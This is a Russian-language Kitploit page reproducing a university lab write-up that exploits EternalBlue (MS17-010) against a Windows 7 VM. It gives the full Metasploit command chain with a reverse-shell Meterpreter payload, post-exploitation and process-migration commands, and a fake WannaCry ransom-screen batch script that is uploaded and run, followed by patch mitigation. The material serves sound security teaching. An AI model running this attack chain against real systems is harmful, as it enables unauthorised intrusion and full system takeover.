Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — Кибербезопасная лаборатория, демонстрирующая эксплуатацию CVE-2017-0144 (EternalBlue) с использованием Metasploit против уязвимой виртуальной машины Windows 7, с получением доступа уровня SYSTEM через Meterpreter. Включает полную цепочку атак, пост-эксплуатацию и смягчение с помощью патча MS17-010, протестировано в изолированной этичной лабораторной среде. | Kitploit
Инструменты/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияПост-эксплуатацияАнализ вредоносных программТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Кибербезопасная лаборатория, демонстрирующая эксплуатацию CVE-2017-0144 (EternalBlue) с использованием Metasploit против уязвимой виртуальной машины Windows 7, с получением доступа уровня SYSTEM через Meterpreter. Включает полную цепочку атак, пост-эксплуатацию и смягчение с помощью патча MS17-010, протестировано в изолированной этичной лабораторной среде.

Реагирование на Инциденты
Лаборатории и Практика
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

Репозиторий
34 месяцев назадЕщё не проверено
Поделиться

Демонстрация эксплойта EternalBlue (MS17-010)

Лабораторная работа по кибербезопасности, демонстрирующая эксплуатацию уязвимости CVE-2017-0144 (EternalBlue) с помощью Metasploit на уязвимой системе Windows 7 с получением доступа уровня SYSTEM через Meterpreter.

Этот проект также симулирует атаку программы-вымогателя типа WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ) и демонстрирует смягчение угрозы с помощью патча безопасности MS17-010.


Module Information

Модуль: CSCM828 Security Vulnerabilities and Penetration Testing

Студенты:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Университет: Университет Суонси


Resources & Downloads

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 Security Update)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Загрузка виртуальных машин)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. Обзор

В этой лабораторной работе демонстрируется:

  • Удаленная эксплуатация уязвимости SMB (MS17-010)
  • Доступ на уровне ядра через EternalBlue
  • Установка сессии Meterpreter
  • Методы постэксплуатации
  • Симуляция программы-вымогателя типа WannaCry (безопасная)
  • Смягчение угрозы с помощью патча

2. Лабораторная среда

Требования

  • VMware Workstation / VirtualBox
  • Минимум 8 ГБ ОЗУ

Атакующая машина

  • Kali Linux
  • Metasploit Framework

Целевая машина

  • Windows 7 SP1 x64 (без патчей)

Сеть

  • Host-only / NAT (изолированная среда)
  • Убедитесь, что обе машины могут взаимодействовать друг с другом

⚠️ Эта лабораторная работа должна проводиться в полностью изолированной среде.


3. Настройка жертвы (Windows 7)

Запустите в командной строке от имени администратора:

Отключение брандмауэра

root@kitploit:~
netsh advfirewall set allprofiles state off

Проверка порта SMB

root@kitploit:~
netstat -an | findstr :445

Отключение обновлений (для стабильности лаборатории)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. Настройка атакующей машины (Kali Linux)

Проверка соединения

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. Этапы эксплуатации

Шаг 1: Сканирование цели

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Ожидаемый результат:

  • Host is VULNERABLE

Шаг 2: Запуск эксплойта

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Шаг 3: Подтверждение доступа

root@kitploit:~
meterpreter > getuid

Ожидаемый результат:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. Постэксплуатация

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

Стабильная миграция

root@kitploit:~
ps
migrate <explorer.exe PID>

7. Симуляция WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ)

Создание полезной нагрузки (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

Загрузка и выполнение

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. Смягчение (Демонстрация патча)

Шаг 1: Загрузка патча

  • Посетите: https://www.catalog.update.microsoft.com/
  • Найдите: KB4012212 Windows 7 x64
  • Загрузите .msu файл

Шаг 2: Установка патча

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

Шаг 3: Перезагрузка

root@kitploit:~
shutdown /r /t 0

Шаг 4: Проверка установки патча

root@kitploit:~
systeminfo | findstr KB4012212

Шаг 5: Повторный запуск эксплойта

Ожидаемый результат:

  • Эксплойт не удается
  • Нет сессии Meterpreter

Шаг 6: Проверка с помощью Nmap

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Ожидаемый результат:

  • NOT VULNERABLE

9. Устранение неполадок

ПроблемаРешение
Эксплойт не удаетсяПроверьте соединение
Нет сессииОтключите брандмауэр
Сессия прерываетсяПовторите эксплойт
Нет видимого окнаПереместитесь в explorer.exe

10. Этические соображения

Этот проект проводится:

  • Только на контролируемых лабораторных машинах
  • В полностью изолированной сети
  • Только в образовательных целях

Несанкционированное использование нарушает:

  • UK Computer Misuse Act 1990

11. Заключение

Эта лабораторная работа демонстрирует:

  • Реальную эксплуатацию SMB с помощью EternalBlue
  • Компрометацию Windows 7 на уровне SYSTEM
  • Симуляцию атаки программы-вымогателя (безопасная)
  • Важность своевременного установки патчей
Скачать инструмент